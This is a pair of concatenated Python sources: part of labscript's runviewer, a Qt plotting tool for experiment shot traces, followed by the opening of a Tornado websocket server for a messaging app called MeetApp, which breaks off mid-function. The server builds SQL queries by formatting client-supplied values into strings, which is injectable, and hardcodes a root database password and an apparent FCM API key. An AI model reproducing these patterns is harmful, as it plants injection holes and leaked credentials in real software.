check_item = self.channel_model.item(i, CHANNEL_MODEL__CHECKBOX_INDEX)
channel = str(check_item.text())
if check_item.checkState() == Qt.Checked and check_item.isEnabled():
# we want to show this plot
# does a plot already exist? If yes, show it
if channel in self.plot_widgets:
self.plot_widgets[channel].show()
# update the plot
# are there plot items for this channel which are shown but should not be?
to_delete = []
for shot in self.plot_items[channel]:
if shot not in ticked_shots.keys():
self.plot_widgets[channel].removeItem(self.plot_items[channel][shot])
# Remove Shutter Markers of unticked Shots
if shot in self.shutter_lines[channel]:
for line in self.shutter_lines[channel][shot][0]:
self.plot_widgets[channel].removeItem(line)
for line in self.shutter_lines[channel][shot][1]:
self.plot_widgets[channel].removeItem(line)
self.shutter_lines[channel].pop(shot)
to_delete.append(shot)
for shot in to_delete:
del self.plot_items[channel][shot]
# do we need to add any plot items for shots that were not previously selected?
for shot, (colour, shutters_checked) in ticked_shots.items():
if shot not in self.plot_items[channel]:
# plot_item = self.plot_widgets[channel].plot(shot.traces[channel][0], shot.traces[channel][1], pen=pg.mkPen(QColor(colour), width=2))
# Add an empty plot, as the custom resampling we do will happen more quickly if we don't attempt to first plot all of the data
plot_item = self.plot_widgets[channel].plot([0, 0], [0], pen=pg.mkPen(QColor(colour), width=2), stepMode=True)
self.plot_items[channel][shot] = plot_item
# Add Shutter Markers of newly ticked Shots
self.add_shutter_markers(shot, channel, shutters_checked)
for t, m in self.all_markers.items():
color = m['color']
color = QColor(color[0], color[1], color[2])
if self.scale_time and self.scalehandler is not None:
t = self.scalehandler.get_scaled_time(t)
line = self.plot_widgets[channel].addLine(x=t, pen=pg.mkPen(color=color, width=1.5, style=Qt.DashLine))
self.all_marker_items[line] = self.plot_widgets[channel]
# If no, create one
else:
self.create_plot(channel, ticked_shots)
else:
if channel not in self.plot_widgets:
self.create_plot(channel, ticked_shots)
self.plot_widgets[channel].hide()
self._resample = True
def create_plot(self, channel, ticked_shots):
self.plot_widgets[channel] = pg.PlotWidget() # name=channel)
self.plot_widgets[channel].setMinimumHeight(200)
self.plot_widgets[channel].setMaximumHeight(200)
self.plot_widgets[channel].setLabel('bottom', 'Time', units='s')
self.plot_widgets[channel].showAxis('right', True)
self.plot_widgets[channel].showAxis('bottom', True)
self.plot_widgets[channel].setXLink('runviewer - time axis link')
self.plot_widgets[channel].sigXRangeChanged.connect(self.on_x_range_changed)
self.plot_widgets[channel].scene().sigMouseMoved.connect(lambda pos: self.mouseMovedEvent(pos, self.plot_widgets[channel], channel))
self.ui.plot_layout.insertWidget(self.ui.plot_layout.count() - 1, self.plot_widgets[channel])
self.shutter_lines[channel] = {} # initialize Storage for shutter lines
self.plot_items.setdefault(channel, {})
has_units = False
units = ''
for shot, (colour, shutters_checked) in ticked_shots.items():
if channel in shot.traces:
# plot_item = self.plot_widgets[channel].plot(shot.traces[channel][0], shot.traces[channel][1], pen=pg.mkPen(QColor(colour), width=2))
# Add an empty plot, as the custom resampling we do will happen more quickly if we don't attempt to first plot all of the data
plot_item = self.plot_widgets[channel].plot([0, 0], [0], pen=pg.mkPen(QColor(colour), width=2), stepMode=True)
self.plot_items[channel][shot] = plot_item
if len(shot.traces[channel]) == 3:
has_units = True
units = shot.traces[channel][2]
# Add Shutter Markers of ticked Shots
self.add_shutter_markers(shot, channel, shutters_checked)
if has_units:
self.plot_widgets[channel].setLabel('left', channel, units=units)
else:
self.plot_widgets[channel].setLabel('left', channel)
def add_shutter_markers(self, shot, channel, shutters_checked):
if shot not in self.shutter_lines[channel] and channel in shot.shutter_times:
self.shutter_lines[channel][shot] = [[], []]
open_color = QColor(0, 255, 0)
close_color = QColor(255, 0, 0)
for t, val in shot.shutter_times[channel].items():
scaled_t = t
if val: # val != 0, shutter open
line = self.plot_widgets[channel].addLine(x=scaled_t, pen=pg.mkPen(color=open_color, width=4., style=Qt.DotLine))
self.shutter_lines[channel][shot][1].append(line)
if not shutters_checked:
line.hide()
else: # else shutter close
line = self.plot_widgets[channel].addLine(x=scaled_t, pen=pg.mkPen(color=close_color, width=4., style=Qt.DotLine))
self.shutter_lines[channel][shot][0].append(line)
if not shutters_checked:
line.hide()
def on_x_range_changed(self, *args):
# print 'x range changed'
self._resample = True
@inmain_decorator(wait_for_return=True)
def _get_resample_params(self, channel, shot):
rect = self.plot_items[channel][shot].getViewBox().viewRect()
xmin, xmax = rect.left(), rect.width() + rect.left()
dx = xmax - xmin
view_range = self.plot_widgets[channel].viewRange()
return view_range[0][0], view_range[0][1], dx
def resample(self, data_x, data_y, xmin, xmax, stop_time, num_pixels):
"""This is a function for downsampling the data before plotting
it. Unlike using nearest neighbour interpolation, this method
preserves the features of the plot. It chooses what value to
use based on what values within a region are most different
from the values it's already chosen. This way, spikes of a short
duration won't just be skipped over as they would with any sort
of interpolation."""
# TODO: Only finely sample the currently visible region. Coarsely sample the rest
# x_out = numpy.float32(numpy.linspace(data_x[0], data_x[-1], 4000*(data_x[-1]-data_x[0])/(xmax-xmin)))
x_out = numpy.float64(numpy.linspace(xmin, xmax, 3 * 2000 + 2))
y_out = numpy.empty(len(x_out) - 1, dtype=numpy.float64)
data_x = numpy.float64(data_x)
data_y = numpy.float64(data_y)
# TODO: investigate only resampling when necessary.
# Currently pyqtgraph sometimes has trouble rendering things
# if you don't resample. If a point is far off the graph,
# and this point is the first that should be drawn for stepMode,
# because there is a long gap before the next point (which is
# visible) then there is a problem.
# Also need to explicitly handle cases where none of the data
# is visible (which resampling does by setting NaNs)
#
# x_data_slice = data_x[(data_x>=xmin)&(data_x<=xmax)]
# print len(data_x)
# if len(x_data_slice) < 3*2000+2:
# x_out = x_data_slice
# y_out = data_y[(data_x>=xmin)&(data_x<=xmax)][:-1]
# logger.info('skipping resampling')
# else:
resampling = True
if resampling:
_resample(data_x, data_y, x_out, y_out, numpy.float64(stop_time))
# self.__resample4(data_x, data_y, x_out, y_out, numpy.float32(stop_time))
else:
x_out, y_out = data_x, data_y
return x_out, y_out
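# Illustrative note (not part of the original code): resample() returns one more x
# value than y value (len(x_out) == len(y_out) + 1), which matches how the result is
# plotted with stepMode=True elsewhere in this file, e.g. (hypothetical values):
#   xnew, ynew = self.resample(trace_x, trace_y, xmin=0.0, xmax=1.0,
#                              stop_time=1.0, num_pixels=dx)
#   plot_item.setData(xnew, ynew, stepMode=True)  # stepMode requires len(x) = len(y) + 1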
def __resample4(self, x_in, y_in, x_out, y_out, stop_time):
# we want x-out to have three times the number of points as there are pixels
# Plus one at the end
# y_out = numpy.empty(len(x_out)-1, dtype=numpy.float64)
# print 'len x_out: %d'%len(x_out)
# A couple of special cases that I don't want to have to put extra checks in for:
if x_out[-1] < x_in[0] or x_out[0] > stop_time:
# We're all the way to the left of the data or all the way to the right. Fill with NaNs:
y_out.fill('NaN')
elif x_out[0] > x_in[-1]:
# We're after the final clock tick, but before stop_time
i = 0
while i < len(x_out) - 1:
if x_out[i] < stop_time:
y_out[i] = y_in[-1]
else:
y_out[i] = numpy.float('NaN')
i += 1
else:
i = 0
j = 1
# Until we get to the data, fill the output array with NaNs (which
# get ignored when plotted)
while x_out[i] < x_in[0]:
y_out[i] = numpy.float('NaN')
y_out[i + 1] = numpy.float('NaN')
y_out[i + 2] = numpy.float('NaN')
i += 3
# If we're some way into the data, we need to skip ahead to where
# we want to get the first datapoint from:
while x_in[j] < x_out[i]:
j += 1
# Get the first datapoint:
# y_out[i] = y_in[j-1]
# i += 1
# Get values until we get to the end of the data:
while j < len(x_in) and i < len(x_out) - 2: # Leave one spare for the final data point and one because stepMode=True requires len(y)=len(x)-1
# This is 'nearest neighbour on the left' interpolation. It's
# what we want if none of the source values checked in the
# upcoming loop are used:
y_out[i] = y_in[j - 1]
i += 2
positive_jump_value = 0
positive_jump_index = j - 1
negative_jump_value = 0
negative_jump_index = j - 1
# now find the max and min values between this x_out time point and the next x_out timepoint
# print i
while j < len(x_in) and x_in[j] < x_out[i]:
jump = y_in[j] - y_out[i - 2]
# would using this source value cause a bigger positive jump?
if jump > 0 and jump > positive_jump_value:
positive_jump_value = jump
positive_jump_index = j
# would using this source value cause a bigger negative jump?
elif jump < 0 and jump < negative_jump_value:
negative_jump_value = jump
negative_jump_index = j
j += 1
if positive_jump_index < negative_jump_index:
y_out[i - 1] = y_in[positive_jump_index]
y_out[i] = y_in[negative_jump_index]
# TODO: We could override the x_out values with x_in[jump_index]
else:
y_out[i - 1] = y_in[negative_jump_index]
y_out[i] = y_in[positive_jump_index]
i += 1
# Get the last datapoint:
if j < len(x_in):
# If the sample rate of the raw data is low, then the current
# j point could be outside the current plot view range
# If so, decrease j so that we take a value that is within the
# plot view range.
if x_in[j] > x_out[-1] and j > 0:
j -= 1
y_out[i] = y_in[j]
i += 1
# if i < len(x_out):
# y_out[i] = y_in[-1]
# i += 1
# Fill the remainder of the array with the last datapoint,
# if t < stop_time, and then NaNs after that:
while i < len(x_out) - 1:
if x_out[i] < stop_time:
y_out[i] = y_in[-1]
else:
y_out[i] = numpy.float('NaN')
i += 1
# return y_out # method changed to modify y_out array in place
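# Illustrative worked example (not part of the original code) of the jump-selection
# logic above: for each group of three output points, the first value is the
# "nearest neighbour on the left", and the remaining two take the source samples that
# produce the largest negative and positive jumps within that window, in the order
# they occur. So a brief spike such as y = [0, 0, 5, 0, 0] falling entirely inside one
# output window still contributes the value 5 to y_out instead of being skipped, which
# is the behaviour described in the resample() docstring.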
def __resample3(self, x_in, y_in, x_out, stop_time):
"""This is a Python implementation of the C extension. For
debugging and developing the C extension."""
y_out = numpy.empty(len(x_out))
i = 0
j = 1
# A couple of special cases that I don't want to have to put extra checks in for:
if x_out[-1] < x_in[0] or x_out[0] > stop_time:
# We're all the way to the left of the data or all the way to the right. Fill with NaNs:
while i < len(x_out):
y_out[i] = numpy.float('NaN')
i += 1
elif x_out[0] > x_in[-1]:
# We're after the final clock tick, but before stop_time
while i < len(x_out):
if x_out[i] < stop_time:
y_out[i] = y_in[-1]
else:
y_out[i] = numpy.float('NaN')
i += 1
else:
# Until we get to the data, fill the output array with NaNs (which
# get ignored when plotted)
while x_out[i] < x_in[0]:
y_out[i] = numpy.float('NaN')
i += 1
# If we're some way into the data, we need to skip ahead to where
# we want to get the first datapoint from:
while x_in[j] < x_out[i]:
j += 1
# Get the first datapoint:
y_out[i] = y_in[j - 1]
i += 1
# Get values until we get to the end of the data:
while j < len(x_in) and i < len(x_out):
# This is 'nearest neighbour on the left' interpolation. It's
# what we want if none of the source values checked in the
# upcoming loop are used:
y_out[i] = y_in[j - 1]
while j < len(x_in) and x_in[j] < x_out[i]:
# Would using this source value cause the interpolated values
# to make a bigger jump?
if numpy.abs(y_in[j] - y_out[i - 1]) > numpy.abs(y_out[i] - y_out[i - 1]):
# If so, use this source value:
y_out[i] = y_in[j]
j += 1
i += 1
# Get the last datapoint:
if i < len(x_out):
y_out[i] = y_in[-1]
i += 1
# Fill the remainder of the array with the last datapoint,
# if t < stop_time, and then NaNs after that:
while i < len(x_out):
if x_out[i] < stop_time:
y_out[i] = y_in[-1]
else:
y_out[i] = numpy.float('NaN')
i += 1
return y_out
def _resample_thread(self):
logger = logging.getLogger('runviewer.resample_thread')
while True:
if self._resample:
self._resample = False
# print 'resampling'
ticked_shots = inmain(self.get_selected_shots_and_colours)
for shot, (colour, shutters_checked) in ticked_shots.items():
for channel in shot.traces:
if self.channel_checked_and_enabled(channel):
try:
xmin, xmax, dx = self._get_resample_params(channel, shot)
# We go a bit outside the visible range so that scrolling
# doesn't immediately go off the edge of the data, and the
# next resampling might have time to fill in more data before
# the user sees any empty space.
if self.scale_time:
xnew, ynew = self.resample(shot.scaled_times(channel), shot.traces[channel][1], xmin, xmax, shot.stop_time, dx)
else:
xnew, ynew = self.resample(shot.traces[channel][0], shot.traces[channel][1], xmin, xmax, shot.stop_time, dx)
inmain(self.plot_items[channel][shot].setData, xnew, ynew, pen=pg.mkPen(QColor(colour), width=2), stepMode=True)
except Exception:
#self._resample = True
pass
else:
logger.info('ignoring channel %s' % channel)
time.sleep(0.5)
@inmain_decorator(wait_for_return=True)
def channel_checked_and_enabled(self, channel):
logger.info('is channel %s enabled' % channel)
index = self.channel_model.index(0, CHANNEL_MODEL__CHANNEL_INDEX)
indexes = self.channel_model.match(index, Qt.DisplayRole, channel, 1, Qt.MatchExactly)
logger.info('number of matches %d' % len(indexes))
if len(indexes) == 1:
check_item = self.channel_model.itemFromIndex(indexes[0])
if check_item.checkState() == Qt.Checked and check_item.isEnabled():
return True
return False
def on_x_axis_reset(self):
ticked_shots = self.get_selected_shots_and_colours()
largest_stop_time = 0
stop_time_set = False
for shot in ticked_shots.keys():
if self.scale_time:
st = self.scalehandler.get_scaled_time(shot.stop_time)
else:
st = shot.stop_time
if st > largest_stop_time:
largest_stop_time = st
stop_time_set = True
if not stop_time_set:
largest_stop_time = 1.0
# Update the range of the link plot
self._hidden_plot[1].setData([0, largest_stop_time], [0, 1e-9])
self._hidden_plot[0].enableAutoRange(axis=pg.ViewBox.XAxis)
def on_y_axes_reset(self):
for plot_widget in self.plot_widgets.values():
plot_widget.enableAutoRange(axis=pg.ViewBox.YAxis)
def _enable_selected_shots(self):
self.update_ticks_of_selected_shots(Qt.Checked)
def _disable_selected_shots(self):
self.update_ticks_of_selected_shots(Qt.Unchecked)
def update_ticks_of_selected_shots(self, state):
# Get the selection model from the treeview
selection_model = self.ui.shot_treeview.selectionModel()
# Create a list of selected row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# for each row selected
for row in selected_row_list:
check_item = self.shot_model.item(row, SHOT_MODEL__CHECKBOX_INDEX)
check_item.setCheckState(state)
def _move_up(self):
# Get the selection model from the treeview
selection_model = self.ui.channel_treeview.selectionModel()
# Create a list of selected row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# For each row selected
for i, row in enumerate(selected_row_list):
# only move the row if it is not element 0, and the row above it is not selected
# (note that while a row above may have been initially selected, it should by now be one row higher
# since we start moving elements of the list upwards starting from the lowest index)
if row > 0 and (row - 1) not in selected_row_list:
# Remove the selected row
items = self.channel_model.takeRow(row)
# Add the selected row into a position one above
self.channel_model.insertRow(row - 1, items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.channel_model.indexFromItem(items[0]), QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] -= 1
self.update_plot_positions()
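# Illustrative example (not part of the original code) of the index bookkeeping above:
# with rows [2, 3] selected, row 2 moves to 1 first (row 1 is not selected), its stored
# index is decremented to 1, and row 3 can then move to 2 on the next iteration. If
# rows [0, 1] were selected, neither would move: row 0 is already at the top and row 1
# is blocked because the row above it is also selected.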
def _move_down(self):
# Get the selection model from the treeview
selection_model = self.ui.channel_treeview.selectionModel()
# Create a list of selected row indices
selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
# For each row selected
for i, row in enumerate(selected_row_list):
# only move the row if it is not the last element, and the row below it is not selected
# (note that while a row below may have been initially selected, it should by now be one row lower
# since we start moving elements of the list upwards starting from the highest index)
if row < self.channel_model.rowCount() - 1 and (row + 1) not in selected_row_list:
# Remove the selected row
items = self.channel_model.takeRow(row)
# Add the selected row into a position one below
self.channel_model.insertRow(row + 1, items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.channel_model.indexFromItem(items[0]), QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] += 1
self.update_plot_positions()
def _move_top(self):
# Get the selection model from the treeview
selection_model = self.ui.channel_treeview.selectionModel()
# Create a list of selected row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# For each row selected
for i, row in enumerate(selected_row_list):
# only move the row while it is not element 0, and the row above it is not selected
# (note that while a row above may have been initially selected, it should by now be one row higher
# since we start moving elements of the list upwards starting from the lowest index)
while row > 0 and (row - 1) not in selected_row_list:
# Remove the selected row
items = self.channel_model.takeRow(row)
# Add the selected row into a position one above
self.channel_model.insertRow(row - 1, items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.channel_model.indexFromItem(items[0]), QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] -= 1
row -= 1
self.update_plot_positions()
def _move_bottom(self):
selection_model = self.ui.channel_treeview.selectionModel()
# Create a list of selected row indices
selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
# For each row selected
for i, row in enumerate(selected_row_list):
# only move the row while it is not the last element, and the row below it is not selected
# (note that while a row below may have been initially selected, it should by now be one row lower
# since we start moving elements of the list upwards starting from the highest index)
while row < self.channel_model.rowCount() - 1 and (row + 1) not in selected_row_list:
# Remove the selected row
items = self.channel_model.takeRow(row)
# Add the selected row into a position one below
self.channel_model.insertRow(row + 1, items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.channel_model.indexFromItem(items[0]), QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] += 1
row += 1
self.update_plot_positions()
def update_plot_positions(self):
# remove all widgets
layout_items = {}
for i in range(self.ui.plot_layout.count()):
if i == 0:
continue
item = self.ui.plot_layout.takeAt(i)
# add all widgets
for i in range(self.channel_model.rowCount()):
check_item = self.channel_model.item(i, CHANNEL_MODEL__CHECKBOX_INDEX)
channel = str(check_item.text())
if channel in self.plot_widgets:
self.ui.plot_layout.addWidget(self.plot_widgets[channel])
if check_item.checkState() == Qt.Checked and check_item.isEnabled():
self.plot_widgets[channel].show()
else:
self.plot_widgets[channel].hide()
self.ui.plot_layout.addWidget(self._time_axis_plot[0])
class Shot(object):
def __init__(self, path):
self.path = path
# Store list of traces
self._traces = None
# store list of channels
self._channels = None
# store list of markers
self._markers = None
self.cached_scaler = None
self._scalehandler = None
self._scaled_x = {}
# store list of shutter changes and calibrations
self._shutter_times = None
self._shutter_calibrations = {}
# TODO: Get this dynamically
device_list = ['PulseBlaster', 'NI_PCIe_6363', 'NI_PCI_6733']
# Load connection table
self.connection_table = ConnectionTable(path)
# open h5 file
with h5py.File(path, 'r') as file:
# Get master pseudoclock
self.master_pseudoclock_name = file['connection table'].attrs['master_pseudoclock']
if isinstance(self.master_pseudoclock_name, bytes):
self.master_pseudoclock_name = self.master_pseudoclock_name.decode('utf8')
else:
self.master_pseudoclock_name = str(self.master_pseudoclock_name)
# get stop time
self.stop_time = file['devices'][self.master_pseudoclock_name].attrs['stop_time']
self.device_names = list(file['devices'].keys())
# Get Shutter Calibrations
if 'calibrations' in file and 'Shutter' in file['calibrations']:
for name, open_delay, close_delay in numpy.array(file['calibrations']['Shutter']):
name = name.decode('utf8') if isinstance(name, bytes) else str(name)
self._shutter_calibrations[name] = [open_delay, close_delay]
def delete_cache(self):
self._channels = None
self._traces = None
def _load(self):
if self._channels is None:
self._channels = {}
if self._traces is None:
self._traces = {}
if self._markers is None:
self._markers = {}
if self._shutter_times is None:
self._shutter_times = {}
self._load_markers()
# Let's walk the connection table, starting with the master pseudoclock
master_pseudoclock_device = self.connection_table.find_by_name(self.master_pseudoclock_name)
self._load_device(master_pseudoclock_device)
# self._scalehandler = ScaleHandler(self._markers.keys(), self.stop_time)
def _load_markers(self):
with h5py.File(self.path, 'r') as file:
if "time_markers" in file:
for row in file["time_markers"]:
self._markers[row['time']] = {'color': row['color'].tolist()[0], 'label': row['label']}
elif "runviewer" in file:
for time, val in file["runviewer"]["markers"].attrs.items():
props = val.strip('{}}').rsplit(",", 1)
color = list(map(int, props[0].split(":")[1].strip(" ()").split(",")))
label = props[1].split(":")[1]
self._markers[float(time)] = {'color': color, 'label': label}
if 0 not in self._markers:
self._markers[0] = {'color': [0,0,0], 'label': 'Start'}
if self.stop_time not in self._markers:
self._markers[self.stop_time] = {'color': [0,0,0], 'label' : 'End'}
def add_trace(self, name, trace, parent_device_name, connection):
name = str(name)
self._channels[name] = {'device_name': parent_device_name, 'port': connection}
self._traces[name] = trace
# add shutter times
con = self.connection_table.find_by_name(name)
if con.device_class == "Shutter" and 'open_state' in con.properties:
self.add_shutter_times([(name, con.properties['open_state'])])
# Temporary solution to physical shutter times
def add_shutter_times(self, shutters):
for name, open_state in shutters:
x_values, y_values = self._traces[name]
if len(x_values) > 0:
change_indices = numpy.where(y_values[:-1] != y_values[1:])[0]
change_indices += 1 # use the index of the value that is changed to
change_values = list(zip(x_values[change_indices], y_values[change_indices]))
change_values.insert(0, (x_values[0], y_values[0])) # insert first value
self._shutter_times[name] = {x_value + (self._shutter_calibrations[name][0] if y_value == open_state else self._shutter_calibrations[name][1]): 1 if y_value == open_state else 0 for x_value, y_value in change_values}
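# Illustrative example (not part of the original code), using made-up numbers: with
# open_state == 1 and self._shutter_calibrations[name] == [1.2e-3, 0.8e-3]
# (open_delay, close_delay), a trace that switches to 1 at t = 0.010 s and back to 0
# at t = 0.020 s produces shutter times {0.0112: 1, 0.0208: 0}, i.e. the digital
# change times shifted by the appropriate delay and flagged 1 for open, 0 for closed.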
def _load_device(self, device, clock=None):
try:
print('loading %s' % device.name)
module = device.device_class
# Load the master pseudoclock class
# labscript_devices.import_device(module)
device_class = labscript_devices.get_runviewer_parser(module)
device_instance = device_class(self.path, device)
clocklines_and_triggers = device_instance.get_traces(self.add_trace, clock)
for name, trace in clocklines_and_triggers.items():
child_device = self.connection_table.find_by_name(name)
for grandchild_device_name, grandchild_device in child_device.child_list.items():
self._load_device(grandchild_device, trace)
except Exception:
# TODO: print/log exception traceback
# if device.name == 'ni_card_0' or device.name == 'pulseblaster_0' or device.name == 'pineblaster_0' or device.name == 'ni_card_1' or device.name == 'novatechdds9m_0':
# raise
# raise
if hasattr(device, 'name'):
print('Failed to load device %s' % device.name)
else:
print('Failed to load device (unknown name, device object does not have attribute name)')
# backwards compat
with h5py.File(self.path, 'r') as file:
if "runviewer" in file:
if "shutter_times" in file["runviewer"]:
for name, val in file["runviewer"]["shutter_times"].attrs.items():
self._shutter_times[name] = {float(key_value.split(":")[0]): int(key_value.split(":")[1]) for key_value in val.strip('{}}').split(",")}
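# Illustrative note (not part of the original code): the backwards-compatibility
# parsing above expects each attribute value in /runviewer/shutter_times to be a
# string of the form "{0.01:1,0.025:0}", i.e. comma-separated time:state pairs,
# which it converts to {0.01: 1, 0.025: 0}. This format is inferred from the parsing
# code, not from a file-format specification.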
def scaled_times(self, channel):
if self.cached_scaler != app.scalehandler:
self.cached_scaler = app.scalehandler
self._scaled_x = {}
if channel not in self._scaled_x:
self._scaled_x[channel] = self.cached_scaler.get_scaled_time(self._traces[channel][0])
return self._scaled_x[channel]
@property
def channels(self):
if self._channels is None:
self._load()
return self._channels.keys()
def clear_cache(self):
# clear cache variables to cut down on memory usage
pass
@property
def markers(self):
if self._markers is None:
self._load()
return self._markers
@property
def traces(self):
# if traces cached:
# return cached traces and waits
if self._traces is None:
self._load()
return self._traces
@property
def shutter_times(self):
if self._shutter_times is None:
self._load()
return self._shutter_times
# @property
# def scalehandler(self):
# if self._scalehandler is None:
# self._load()
# return self._scalehandler
class TempShot(Shot):
def __init__(self, i):
Shot.__init__(self, 'shot %d' % i)
self._channels = ['Bx', 'By', 'Bz', 'Bq']
self.stop_time = i + 1
self.traces = {}
no_x_points = 10000
for channel in self.channels:
# self.traces[channel] = (numpy.linspace(0,10,no_x_points), numpy.random.rand(no_x_points))
x_points = numpy.linspace(0, self.stop_time, no_x_points)
self.traces[channel] = (x_points, (i + 1) * numpy.sin(x_points * numpy.pi + i / 11.0 * 2 * numpy.pi))
@property
def channels(self):
return self._channels
def get_traces(self):
return self.traces
class RunviewerServer(ZMQServer):
def __init__(self, *args, **kwargs):
ZMQServer.__init__(self, *args, **kwargs)
self.logger = logging.getLogger('runviewer.server')
def handler(self, h5_filepath):
if h5_filepath == 'hello':
return 'hello'
self.logger.info('Received hdf5 file: %s' % h5_filepath)
# Convert path to local slashes and shared drive prefix:
h5_filepath = labscript_utils.shared_drive.path_to_local(h5_filepath)
logger.info('local filepath: %s' % h5_filepath)
# we add the shot to a queue so that we don't have to wait for the app to come up before
# responding to runmanager
shots_to_process_queue.put(h5_filepath)
return 'ok'
if __name__ == "__main__":
qapplication = QApplication(sys.argv)
shots_to_process_queue = Queue()
exp_config = LabConfig(required_params = {"DEFAULT": ["experiment_name"], "paths": ["shared_drive", "experiment_shot_storage"], 'ports': ['runviewer']})
port = int(exp_config.get('ports', 'runviewer'))
myappid = 'monashbec.runviewer' # arbitrary string
try:
ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)
except:
logger.info('Not on a windows machine')
# Start experiment server
experiment_server = RunviewerServer(port)
app = RunViewer(exp_config)
def execute_program():
qapplication.exec_()
sys.exit(execute_program())
|
meetAppServer.py
|
#!/usr/bin/python
'''
* Copyright (c) 2017.
* Author: Pranjal P. Joshi
* Application: MeetApp
* All rights reserved.
'''
import tornado.httpserver
import tornado.websocket
import tornado.ioloop
import tornado.web
import socket
import os
import json
import time
import sys
import ast
import MySQLdb as mdb
import pymysql.cursors
import threading
import datetime
import base64
from Crypto.Cipher import AES
from pyfcm import FCMNotification
###### Main server #########
##### STATIC_VARIABLES #####
PORT = 80
DEBUG = True
USE_PYMYSQL = False
PUSH_ENABLE = True
SHOW_RAW_MSGS = True
NO_OF_CONNECTIONS = 0
PONG_TIMEOUT = 10 # seconds
CONNECTION_CLOSE_TIMEOUT = 20 # Minutes
DB_NAME = "meetapp_server"
DB_USER = "root"
DB_PASSWD = "linux"
ANDROID_PACKAGE_NAME = 'com.cyberfox.meetapp'
FCM_KEY = "AAAAR9TOyxc:APA91bHqHw0U9vYdtdU-dOWijZR1lHSZHvIse42udNxWNgPc3syNg3im-fVpRBJE3qgCQq4vgVgwQr4LFugL33Ia4s8YddEyMYo7KDibOuoxl8LehlCHg40okxnIeIuD7ltfXlxZava1"
#### Global variables ####
activeUsers = []
onlineClientsNumbers = []
offlineClientNumbers = []
connectionAlreadyExists = False
replaceCount = 0
### JSON Data ###
push_open = {"pushType":"open"}
### Core functions ###
def initDB():
print "Initializing MySQL database."
db.execute("show databases")
a = db.fetchall()
a = str(a)
if(a.find(DB_NAME) > 0):
print "---> Database found.\n"
else:
print "---> Database not found. creating...\n"
db.execute("create database %s" % DB_NAME)
db.execute("use %s" % DB_NAME)
db.execute("create table registration_table(_id BIGINT NOT NULL AUTO_INCREMENT, registered_number VARCHAR(20) NOT NULL, fcm_token VARCHAR(500) NOT NULL, PRIMARY KEY(_id))")
db.execute("create table store_and_fwd_table(_id BIGINT NOT NULL AUTO_INCREMENT, arrive_timestamp VARCHAR(20), expire_timestamp VARCHAR(20), send_to VARCHAR(15), sent_from VARCHAR(15), message VARCHAR(4000), PRIMARY KEY(_id))")
#con.commit()
def onOpen(msg,socket):
if msg['type'] == "onOpen":
lenghtOfActiveUsers = len(activeUsers)
connectionAlreadyExists = False
for i in range(0,lenghtOfActiveUsers):
if(activeUsers[i].keys()[0] == msg['from']):
tempDict = activeUsers[i]
tempDict[msg['from']] = socket
activeUsers[i] = tempDict
connectionAlreadyExists = True
if DEBUG:
print "Replacing exisiting connection : %s" % phoneNumberFormatter(msg['from'])
break
if(not connectionAlreadyExists):
tempDict = {}
tempDict[msg['from']] = socket
activeUsers.append(tempDict)
if DEBUG:
print "New connection created : %s" % phoneNumberFormatter(msg['from'])
# THIS WILL SYNC DATA ON CONNECTION
checkIfOnline(phoneNumberFormatter(msg['from']))
def onRegisterUserRequest(req):
if req['type'] == "register":
number = str(req['from'])
number = phoneNumberFormatter(number)
fcm_token = str(req['fcm_token'])
db.execute("use meetapp_server")
db.execute("select _id from registration_table where registered_number=%s" % number)
data = db.fetchall()
if not data:
db.execute("insert into registration_table(registered_number, fcm_token) values ('%s','%s')" % (number, fcm_token))
#con.commit()
if DEBUG:
print "New user registered: %s" % number
else:
if DEBUG:
print "User already exists: %s" % number
def onDeleteAccountRequest(req):
if(req['type'] == "deleteAccount"):
number = phoneNumberFormatter(str(req['from']))
fcm_token = str(req['fcm_token'])
db.execute("use meetapp_server")
db.execute("delete from registration_table where registered_number=%s" % number)
#con.commit()
def onUpdateTokenRequest(req):
if req['type'] == "tokenUpdate":
number = str(req['from'])
number = phoneNumberFormatter(number)
token = str(req['fcm_token'])
if number is None:
number = "null"
if token is None:
token = "null"
db.execute("use meetapp_server")
db.execute("update registration_table set fcm_token='%s' where registered_number='%s'" % (token,number))
#con.commit()
if DEBUG:
print "Token Updated. Token: " + token + " From: " + number
def onContactSyncRequest(req, socket):
if req['type'] == "syncRequest":
number = str(req['from'])
total = int(req['total'])
phonebook = req['phonebook']
existingCount = 0
syncedNumbers = {}
db.execute("use meetapp_server")
for i in range(1,total):
checkThisNumber = str(phonebook[str(i)])
checkThisNumber = phoneNumberFormatter(checkThisNumber)
if not (checkThisNumber.find('*') > -1 or checkThisNumber.find('#') > -1):
checkThisNumber = checkThisNumber[-10:]
db.execute("select registered_number from registration_table where registered_number like '%{}%'".format(str(checkThisNumber)))
data = db.fetchone()
if data == None:
pass
else:
if not USE_PYMYSQL:
if not data[0] in syncedNumbers.values(): # avoids duplicating the same number in the json resp
if data[0] != number: # don't send syncer's number back to him --> NOT_TESTED <-- Change if ERROR---
existingCount += 1
syncedNumbers.update({str(existingCount):str(data[0])})
else:
if not data['registered_number'] in syncedNumbers.values(): # avoids duplicating the same number in the json resp
if data['registered_number'] != number: # don't send syncer's number back to him --> NOT_TESTED <-- Change if ERROR---
existingCount += 1
syncedNumbers.update({str(existingCount):str(data['registered_number'])})
resp = {'from':'server','existingCount':str(existingCount),'type':'syncResponse','syncedNumbers':syncedNumbers}
resp = json.dumps(resp)
if DEBUG:
print resp
socket.write_message(aes.encrypt(resp))
def onTripLocationUpdateReceive(req):
if req['type'] == "locationUpdate":
sender = getFullRegisteredNumberFrom(req['from'])
send_to = getFullRegisteredNumberFrom(req['to'])
req['from'] = "server"
